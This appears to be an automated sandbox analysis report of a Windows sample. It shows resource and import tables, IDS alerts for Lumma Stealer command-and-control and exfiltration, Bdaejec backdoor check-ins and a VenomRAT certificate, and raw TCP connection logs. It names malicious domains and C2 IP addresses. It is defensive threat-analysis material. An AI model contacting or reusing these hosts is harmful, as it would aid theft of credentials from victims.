                                                                                    RT_ICON0xb85580x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkishTurkey0.6908844765342961
                                                                                    RT_ICON0xb8e000x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkishTurkey0.7505760368663594
                                                                                    RT_ICON0xb94c80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkishTurkey0.7933526011560693
                                                                                    RT_ICON0xb9a300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkishTurkey0.5911825726141079
                                                                                    RT_ICON0xbbfd80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkishTurkey0.7216228893058161
                                                                                    RT_ICON0xbd0800x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkishTurkey0.7368852459016394
                                                                                    RT_ICON0xbda080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkishTurkey0.8829787234042553
                                                                                    RT_STRING0xbe5f80xd4data0.5943396226415094
                                                                                    RT_STRING0xbe6d00x78cdata0.42857142857142855
                                                                                    RT_STRING0xbee600x572data0.445480631276901
                                                                                    RT_STRING0xbf3d80x596data0.44265734265734263
                                                                                    RT_STRING0xbf9700x214data0.4906015037593985
                                                                                    RT_STRING0xbfb880x876data0.41043397968605727
                                                                                    RT_STRING0xc04000x744data0.432258064516129
                                                                                    RT_STRING0xc0b480x55edata0.4497816593886463
                                                                                    RT_STRING0xc10a80x7c0data0.4178427419354839
                                                                                    RT_STRING0xc18680x69edata0.43565525383707204
                                                                                    RT_STRING0xc1f080x7b6data0.4204660587639311
                                                                                    RT_STRING0xc26c00x540data0.44494047619047616
                                                                                    RT_STRING0xc2c000x590data0.44803370786516855
                                                                                    RT_STRING0xc31900x710data0.4247787610619469
                                                                                    RT_STRING0xc38a00x6c2data0.43583815028901735
                                                                                    RT_STRING0xc3f680x720data0.4243421052631579
                                                                                    RT_STRING0xc46880x6cdata0.6481481481481481
                                                                                    RT_ACCELERATOR0xbe2e80x18data1.2916666666666667
                                                                                    RT_GROUP_CURSOR0xbe4300x14data1.15
                                                                                    RT_GROUP_ICON0xbde700x76dataTurkishTurkey0.6610169491525424
                                                                                    RT_VERSION0xbe4480x1b0data0.5949074074074074
                                                                                    DLLImport
                                                                                    KERNEL32.dllGetConsoleAliasesLengthW, CreateJobObjectW, SleepEx, GetCommProperties, GetModuleHandleW, GetConsoleAliasesA, GlobalAlloc, SetVolumeMountPointA, lstrcpynW, GetModuleFileNameW, SetConsoleTitleA, WritePrivateProfileStringW, ReleaseActCtx, SetLastError, GetProcAddress, BuildCommDCBW, GetAtomNameA, LoadLibraryA, WriteConsoleA, UnhandledExceptionFilter, InterlockedExchangeAdd, SetFileApisToANSI, AddAtomA, OpenJobObjectW, FoldStringW, EnumDateFormatsA, lstrcatW, FindFirstVolumeW, LocalFree, FlushFileBuffers, CloseHandle, GetLastError, HeapFree, MultiByteToWideChar, HeapAlloc, GetStartupInfoW, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, HeapReAlloc, GetCPInfo, InterlockedIncrement, InterlockedDecrement, GetACP, GetOEMCP, IsValidCodePage, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, InitializeCriticalSectionAndSpinCount, RtlUnwind, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, SetStdHandle, GetConsoleOutputCP, WriteConsoleW, HeapSize, CreateFileA
                                                                                    USER32.dllGetProcessDefaultLayout
                                                                                    WINHTTP.dllWinHttpAddRequestHeaders
                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                    TurkishTurkey
                                                                                    TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
                                                                                    2024-07-24T19:56:24.675453+0200TCP2019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile4973380192.168.2.1064.190.113.113
                                                                                    2024-07-24T19:57:04.292679+0200TCP2054602ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)49772443192.168.2.10188.114.96.3
                                                                                    2024-07-24T19:56:50.332358+0200UDP2054591ET MALWARE Lumma Stealer Domain in DNS Lookup (callosallsaospz .shop)6446553192.168.2.101.1.1.1
                                                                                    2024-07-24T19:57:26.536004+0200TCP2054604ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)49790443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:56:56.104324+0200TCP2054602ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)49762443192.168.2.10188.114.96.3
                                                                                    2024-07-24T19:57:18.343059+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49780443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:55:04.239382+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5134953192.168.2.101.1.1.1
                                                                                    2024-07-24T19:55:06.316845+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5134953192.168.2.101.1.1.1
                                                                                    2024-07-24T19:57:02.045424+0200TCP2054602ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)49769443192.168.2.10188.114.96.3
                                                                                    2024-07-24T19:57:31.288308+0200TCP2054604ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)49793443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:57:36.718743+0200TCP2054604ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)49797443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:58:10.395667+0200TCP2052267ET MALWARE Observed Malicious SSL Cert (VenomRAT)44494982194.156.79.190192.168.2.10
                                                                                    2024-07-24T19:56:52.823568+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49756443192.168.2.10188.114.96.3
                                                                                    2024-07-24T19:56:51.530840+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49754443192.168.2.10188.114.96.3
                                                                                    2024-07-24T19:57:17.023516+0200UDP2054593ET MALWARE Lumma Stealer Domain in DNS Lookup (liernessfornicsa .shop)5189353192.168.2.101.1.1.1
                                                                                    2024-07-24T19:56:57.773404+0200TCP2054602ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)49765443192.168.2.10188.114.96.3
                                                                                    2024-07-24T19:57:40.123477+0200TCP2054604ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)49800443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:56:52.312670+0200TCP2054602ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)49756443192.168.2.10188.114.96.3
                                                                                    2024-07-24T19:55:40.357738+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49711799192.168.2.1044.221.84.105
                                                                                    2024-07-24T19:55:43.508123+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49716799192.168.2.1044.221.84.105
                                                                                    2024-07-24T19:57:40.591985+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49800443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:56:54.697261+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration49760443192.168.2.10188.114.96.3
                                                                                    2024-07-24T19:56:50.928961+0200TCP2054602ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)49754443192.168.2.10188.114.96.3
                                                                                    2024-07-24T19:56:54.154691+0200TCP2054602ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)49760443192.168.2.10188.114.96.3
                                                                                    2024-07-24T19:56:59.871319+0200TCP2054602ET MALWARE Lumma Stealer Domain in TLS SNI (callosallsaospz .shop)49767443192.168.2.10188.114.96.3
                                                                                    2024-07-24T19:57:17.531048+0200TCP2054604ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)49780443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:57:18.875038+0200TCP2054604ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)49782443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:57:22.094261+0200TCP2054604ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)49785443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:57:24.551102+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration49787443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:57:45.110905+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49803443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:57:05.217652+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49772443192.168.2.10188.114.96.3
                                                                                    2024-07-24T19:57:41.841093+0200TCP2054604ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)49803443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:57:22.834216+0200TCP2048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration49785443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:57:19.383145+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin49782443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:55:09.065962+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49703799192.168.2.1044.221.84.105
                                                                                    2024-07-24T19:55:40.788193+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49712799192.168.2.1044.221.84.105
                                                                                    2024-07-24T19:55:43.046215+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49715799192.168.2.1044.221.84.105
                                                                                    2024-07-24T19:57:24.046577+0200TCP2054604ET MALWARE Lumma Stealer Domain in TLS SNI (liernessfornicsa .shop)49787443192.168.2.10172.67.213.85
                                                                                    2024-07-24T19:55:05.253162+0200UDP2838522ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup5134953192.168.2.101.1.1.1
                                                                                    2024-07-24T19:55:41.395577+0200TCP2807908ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin49713799192.168.2.1044.221.84.105
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Jul 24, 2024 19:55:07.932502031 CEST49703799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:07.937602997 CEST7994970344.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:07.937777996 CEST49703799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:07.938378096 CEST49703799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:07.943240881 CEST7994970344.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:09.065854073 CEST7994970344.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:09.065963030 CEST7994970344.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:09.065962076 CEST49703799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:09.065983057 CEST7994970344.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:09.066032887 CEST49703799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:09.066138983 CEST49703799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:09.066525936 CEST7994970344.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:09.066600084 CEST49703799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:09.067558050 CEST7994970344.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:09.067621946 CEST49703799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:09.077153921 CEST49703799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:09.082031012 CEST7994970344.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:39.948380947 CEST49711799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:39.953352928 CEST7994971144.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:39.953457117 CEST49711799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:39.957458019 CEST49711799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:39.962291002 CEST7994971144.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:40.357336998 CEST7994971144.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:40.357660055 CEST7994971144.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:40.357738018 CEST49711799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:40.369874001 CEST49711799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:40.374850988 CEST7994971144.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:40.395781994 CEST49712799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:40.401002884 CEST7994971244.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:40.401640892 CEST49712799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:40.415846109 CEST49712799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:40.422559023 CEST7994971244.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:40.788125038 CEST7994971244.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:40.788192987 CEST49712799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:40.788788080 CEST7994971244.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:40.788834095 CEST49712799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:40.808151007 CEST49712799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:40.813118935 CEST7994971244.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:40.984081030 CEST49713799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:40.989516973 CEST7994971344.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:40.989609003 CEST49713799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:40.989783049 CEST49713799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:40.995042086 CEST7994971344.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:41.395477057 CEST7994971344.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:41.395576954 CEST49713799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:41.395601034 CEST7994971344.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:41.395679951 CEST49713799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:41.424741983 CEST49713799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:41.429884911 CEST7994971344.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:42.654222012 CEST49715799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:42.659123898 CEST7994971544.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:42.659216881 CEST49715799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:42.662909031 CEST49715799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:42.667814970 CEST7994971544.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:43.046120882 CEST7994971544.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:43.046215057 CEST49715799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:43.047267914 CEST7994971544.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:43.047327042 CEST49715799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:43.051461935 CEST49715799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:43.056433916 CEST7994971544.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:43.092382908 CEST49716799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:43.101588964 CEST7994971644.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:43.101663113 CEST49716799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:43.114099026 CEST49716799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:43.121213913 CEST7994971644.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:43.508059978 CEST7994971644.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:43.508122921 CEST49716799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:43.508228064 CEST7994971644.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:43.508270025 CEST49716799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:43.519081116 CEST49716799192.168.2.1044.221.84.105
                                                                                    Jul 24, 2024 19:55:43.523905993 CEST7994971644.221.84.105192.168.2.10
                                                                                    Jul 24, 2024 19:55:45.886168957 CEST4971780192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:45.891465902 CEST8049717189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:45.891531944 CEST4971780192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:45.891680002 CEST4971780192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:45.891705990 CEST4971780192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:45.897031069 CEST8049717189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:45.897041082 CEST8049717189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:46.938671112 CEST8049717189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:46.939034939 CEST8049717189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:46.939121962 CEST4971780192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:46.939877987 CEST4971780192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:46.942456007 CEST4971880192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:46.944690943 CEST8049717189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:46.948703051 CEST8049718189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:46.948765993 CEST4971880192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:46.948877096 CEST4971880192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:46.948895931 CEST4971880192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:46.953785896 CEST8049718189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:46.953803062 CEST8049718189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:48.008116007 CEST8049718189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:48.008141041 CEST8049718189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:48.008235931 CEST4971880192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:48.008393049 CEST4971880192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:48.010766983 CEST4971980192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:48.013396978 CEST8049718189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:48.015630960 CEST8049719189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:48.015705109 CEST4971980192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:48.017388105 CEST4971980192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:48.017420053 CEST4971980192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:48.022166967 CEST8049719189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:48.023077011 CEST8049719189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:49.286451101 CEST8049719189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:49.287259102 CEST8049719189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:49.287312031 CEST4971980192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:49.287348032 CEST4971980192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:49.290477991 CEST4972080192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:49.292232990 CEST8049719189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:49.295427084 CEST8049720189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:49.295509100 CEST4972080192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:49.295620918 CEST4972080192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:49.295650005 CEST4972080192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:49.300555944 CEST8049720189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:49.300565958 CEST8049720189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:50.375511885 CEST8049720189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:50.375607014 CEST8049720189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:50.375679970 CEST4972080192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:50.375888109 CEST4972080192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:50.379106998 CEST4972180192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:50.381869078 CEST8049720189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:50.384087086 CEST8049721189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:50.384171963 CEST4972180192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:50.384366989 CEST4972180192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:50.384402990 CEST4972180192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:50.389411926 CEST8049721189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:50.389611006 CEST8049721189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:51.430130959 CEST8049721189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:51.432835102 CEST8049721189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:51.432929993 CEST4972180192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:51.433012009 CEST4972180192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:51.438251019 CEST8049721189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:51.440495014 CEST4972280192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:51.446794033 CEST8049722189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:51.446882010 CEST4972280192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:51.447033882 CEST4972280192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:51.447058916 CEST4972280192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:51.452243090 CEST8049722189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:51.452267885 CEST8049722189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:52.507863998 CEST8049722189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:52.508261919 CEST8049722189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:52.508514881 CEST4972280192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:52.508800983 CEST4972280192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:52.512342930 CEST4972380192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:52.513561010 CEST8049722189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:52.517777920 CEST8049723189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:52.519520044 CEST4972380192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:52.519596100 CEST4972380192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:52.519608974 CEST4972380192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:52.524522066 CEST8049723189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:52.525083065 CEST8049723189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:53.617111921 CEST8049723189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:53.617572069 CEST8049723189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:53.617855072 CEST4972380192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:53.620285034 CEST4972380192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:53.623555899 CEST4972480192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:53.625089884 CEST8049723189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:53.628689051 CEST8049724189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:53.628786087 CEST4972480192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:53.628927946 CEST4972480192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:53.628963947 CEST4972480192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:53.634114027 CEST8049724189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:53.636328936 CEST8049724189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:54.697163105 CEST8049724189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:54.697778940 CEST8049724189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:54.697865009 CEST4972480192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:54.697948933 CEST4972480192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:55:54.701661110 CEST4972580192.168.2.1077.221.157.163
                                                                                    Jul 24, 2024 19:55:54.702905893 CEST8049724189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:55:54.707153082 CEST804972577.221.157.163192.168.2.10
                                                                                    Jul 24, 2024 19:55:54.707237959 CEST4972580192.168.2.1077.221.157.163
                                                                                    Jul 24, 2024 19:55:54.707387924 CEST4972580192.168.2.1077.221.157.163
                                                                                    Jul 24, 2024 19:55:54.713185072 CEST804972577.221.157.163192.168.2.10
                                                                                    Jul 24, 2024 19:56:16.112101078 CEST804972577.221.157.163192.168.2.10
                                                                                    Jul 24, 2024 19:56:16.112270117 CEST4972580192.168.2.1077.221.157.163
                                                                                    Jul 24, 2024 19:56:16.114320040 CEST4972580192.168.2.1077.221.157.163
                                                                                    Jul 24, 2024 19:56:16.118779898 CEST4972780192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:56:16.120098114 CEST804972577.221.157.163192.168.2.10
                                                                                    Jul 24, 2024 19:56:16.126554012 CEST8049727189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:56:16.126692057 CEST4972780192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:56:16.126836061 CEST4972780192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:56:16.126872063 CEST4972780192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:56:16.134166956 CEST8049727189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:56:16.134907961 CEST8049727189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:56:17.278422117 CEST8049727189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:56:17.281794071 CEST8049727189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:56:17.281867981 CEST4972780192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:56:17.281958103 CEST4972780192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:56:17.285010099 CEST4972880192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:56:17.286905050 CEST8049727189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:56:17.290555000 CEST8049728189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:56:17.290625095 CEST4972880192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:56:17.290776968 CEST4972880192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:56:17.290802002 CEST4972880192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:56:17.296019077 CEST8049728189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:56:17.296032906 CEST8049728189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:56:18.352253914 CEST8049728189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:56:18.353010893 CEST8049728189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:56:18.353115082 CEST4972880192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:56:18.353163004 CEST4972880192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:56:18.358460903 CEST8049728189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:56:18.367558002 CEST4972980192.168.2.10189.165.133.52
                                                                                    Jul 24, 2024 19:56:18.372493982 CEST8049729189.165.133.52192.168.2.10
                                                                                    Jul 24, 2024 19:56:18.372575998 CEST4972980192.168.2.10189.165.133.52
